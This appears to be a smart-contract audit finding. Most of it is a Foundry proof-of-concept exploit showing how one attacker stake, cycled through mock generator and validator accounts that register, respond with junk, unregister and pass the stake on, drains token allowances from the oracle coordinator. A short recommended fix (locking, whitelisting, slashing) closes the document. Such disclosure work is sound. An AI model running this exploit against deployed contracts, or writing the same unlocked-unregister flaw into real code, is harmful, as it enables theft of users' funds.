The attacker registers mock generators, responds with invalid output values and unregisters, repeating the same procedure with mock validators.
pragma solidity ^0.8.20;
import {Test, console} from "forge-std/Test.sol";
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import {ERC1967Proxy} from "@openzeppelin/contracts/proxy/ERC1967/ERC1967Proxy.sol";
import {Swan} from "../contracts/swan/Swan.sol";
import {SwanMarketParameters} from "../contracts/swan/SwanManager.sol";
import {LLMOracleTaskParameters} from "../contracts/llm/LLMOracleTask.sol";
import {LLMOracleCoordinator} from "../contracts/llm/LLMOracleCoordinator.sol";
import {LLMOracleRegistry, LLMOracleKind} from "../contracts/llm/LLMOracleRegistry.sol";
import {BuyerAgentFactory, BuyerAgent} from "../contracts/swan/BuyerAgent.sol";
import {SwanAssetFactory, SwanAsset} from "../contracts/swan/SwanAsset.sol";
contract MockERC20 is ERC20 {
constructor(string memory _name, string memory _symbol) ERC20(_name, _symbol) {}
}
contract POC is Test {
IERC20 dria;
LLMOracleCoordinator coordinator;
LLMOracleRegistry registry;
address buyerAgentFactory;
address swanAssetFactory;
Swan swan;
uint256 maxAssetCount = 5;
uint256 withdrawInterval = 30 minutes;
uint256 sellInterval = 60 minutes;
uint256 buyInterval = 20 minutes;
uint256 numGenerations = 5;
uint256 numValidations = 5;
uint256 generatorStakeAmount = 100 ether;
uint256 validatorStakeAmount = 100 ether;
uint8 difficulty = 10;
uint256 generationFee = 0.02 ether;
uint256 validationFee = 0.03 ether;
function setUp() public {
buyerAgentFactory = address(new BuyerAgentFactory());
swanAssetFactory = address(new SwanAssetFactory());
dria = IERC20(new MockERC20("dria", "dria"));
address impl = address(new LLMOracleRegistry());
bytes memory data =
abi.encodeCall(LLMOracleRegistry.initialize, (generatorStakeAmount, validatorStakeAmount, address(dria)));
address proxy = address(new ERC1967Proxy(impl, data));
registry = LLMOracleRegistry(proxy);
impl = address(new LLMOracleCoordinator());
uint256 platformFee = 1;
data = abi.encodeCall(
LLMOracleCoordinator.initialize,
(address(registry), address(dria), platformFee, generationFee, validationFee)
);
proxy = address(new ERC1967Proxy(impl, data));
coordinator = LLMOracleCoordinator(proxy);
impl = address(new Swan());
LLMOracleTaskParameters memory llmParams = LLMOracleTaskParameters({
difficulty: difficulty,
numGenerations: uint40(numGenerations),
numValidations: uint40(numValidations)
});
SwanMarketParameters memory swanParams = SwanMarketParameters({
withdrawInterval: withdrawInterval,
sellInterval: sellInterval,
buyInterval: buyInterval,
platformFee: 1,
maxAssetCount: maxAssetCount,
timestamp: 0
});
data = abi.encodeCall(
Swan.initialize,
(swanParams, llmParams, address(coordinator), address(dria), buyerAgentFactory, swanAssetFactory)
);
proxy = address(new ERC1967Proxy(impl, data));
swan = Swan(proxy);
}
function test_PoC() public {
address buyer = makeAddr("buyer");
uint96 feeRoyalty = 1;
uint256 amountPerRound = 0.1 ether;
vm.startPrank(buyer);
BuyerAgent agent = swan.createBuyer("agent/1.0", "Testing agent", feeRoyalty, amountPerRound);
vm.warp(block.timestamp + sellInterval + 1);
(uint256 totalFee,,) = coordinator.getFee(agent.swan().getOracleParameters());
deal(address(dria), address(agent), totalFee);
bytes memory input = bytes("test input");
agent.oraclePurchaseRequest(input, bytes("test models"));
vm.stopPrank();
address attacker = makeAddr("attacker");
deal(address(dria), attacker, generatorStakeAmount);
vm.prank(attacker);
dria.transfer(
makeAddr(string(abi.encodePacked("mockGenerator", vm.toString(uint256(0))))), generatorStakeAmount
);
for (uint256 i = 0; i < numGenerations; i++) {
address mockGenerator = makeAddr(string(abi.encodePacked("mockGenerator", vm.toString(i))));
vm.startPrank(mockGenerator);
dria.approve(address(registry), generatorStakeAmount);
registry.register(LLMOracleKind.Generator);
vm.stopPrank();
vm.startPrank(mockGenerator);
coordinator.respond(
1,
getValidNonce(1, input, address(agent), mockGenerator),
bytes("Random output"),
bytes("Random metadata")
);
vm.stopPrank();
vm.prank(mockGenerator);
registry.unregister(LLMOracleKind.Generator);
if (i == numGenerations - 1) {
address firstMockValidator =
makeAddr(string(abi.encodePacked("mockValidator", vm.toString(uint256(0)))));
vm.prank(mockGenerator);
dria.transferFrom(address(registry), firstMockValidator, generatorStakeAmount);
} else {
address nextMockGenerator = makeAddr(string(abi.encodePacked("mockGenerator", vm.toString(i + 1))));
vm.prank(mockGenerator);
dria.transferFrom(address(registry), nextMockGenerator, generatorStakeAmount);
}
}
for (uint256 i = 0; i < numValidations; i++) {
address mockValidator = makeAddr(string(abi.encodePacked("mockValidator", vm.toString(i))));
vm.startPrank(mockValidator);
dria.approve(address(registry), validatorStakeAmount);
registry.register(LLMOracleKind.Validator);
vm.stopPrank();
vm.startPrank(mockValidator);
uint256[] memory scores = new uint256[]();
coordinator.validate(
1, getValidNonce(1, input, address(agent), mockValidator), scores, bytes("Random metadata")
);
vm.stopPrank();
vm.prank(mockValidator);
registry.unregister(LLMOracleKind.Validator);
if (i == numValidations - 1) {
vm.prank(mockValidator);
dria.transferFrom(address(registry), attacker, validatorStakeAmount);
} else {
address nextMockValidator = makeAddr(string(abi.encodePacked("mockValidator", vm.toString(i + 1))));
vm.prank(mockValidator);
dria.transferFrom(address(registry), nextMockValidator, validatorStakeAmount);
}
}
for (uint256 i = 0; i < numGenerations; i++) {
address mockGenerator = makeAddr(string(abi.encodePacked("mockGenerator", vm.toString(i))));
vm.startPrank(mockGenerator);
dria.transferFrom(address(coordinator), attacker, dria.allowance(address(coordinator), mockGenerator));
vm.stopPrank();
address mockValidator = makeAddr(string(abi.encodePacked("mockValidator", vm.toString(i))));
vm.startPrank(mockValidator);
dria.transferFrom(address(coordinator), attacker, dria.allowance(address(coordinator), mockValidator));
vm.stopPrank();
}
console.log("Attacker balance :", dria.balanceOf(attacker));
}
function getValidNonce(uint256 taskId, bytes memory input, address requester, address sender)
private
view
returns (uint256 nonce)
{
bytes memory message;
do {
nonce++;
message = abi.encodePacked(taskId, input, requester, sender, nonce);
} while (uint256(keccak256(message)) > type(uint256).max >> uint256(difficulty));
}
}
Introduce a locking mechanism that will prohibit validators and generators from unregistering while a request they responded/validated hasn't been finalized. Furthermore, the generators/validators of the LLMOracleRegistry
could be registered by a whitelist. Finally, a long-term solution would be to introduce a slashing mechanism for misbehaving generators/validators.